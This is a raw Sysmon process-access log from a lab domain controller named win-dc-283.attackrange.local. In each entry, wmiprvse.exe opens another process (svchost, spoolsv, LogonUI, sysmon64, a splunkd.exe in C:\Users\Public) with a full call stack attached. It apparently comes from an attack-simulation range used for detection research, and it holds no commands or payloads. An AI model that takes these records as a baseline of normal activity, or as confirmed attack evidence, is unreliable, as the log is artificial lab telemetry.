15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025576Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025575Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025574Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025573Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025572Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025571Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025570Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025569Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025568Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025567Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025566Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025565Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025564Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025563Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025562Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025561Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025560Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025559Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025558Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025557Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 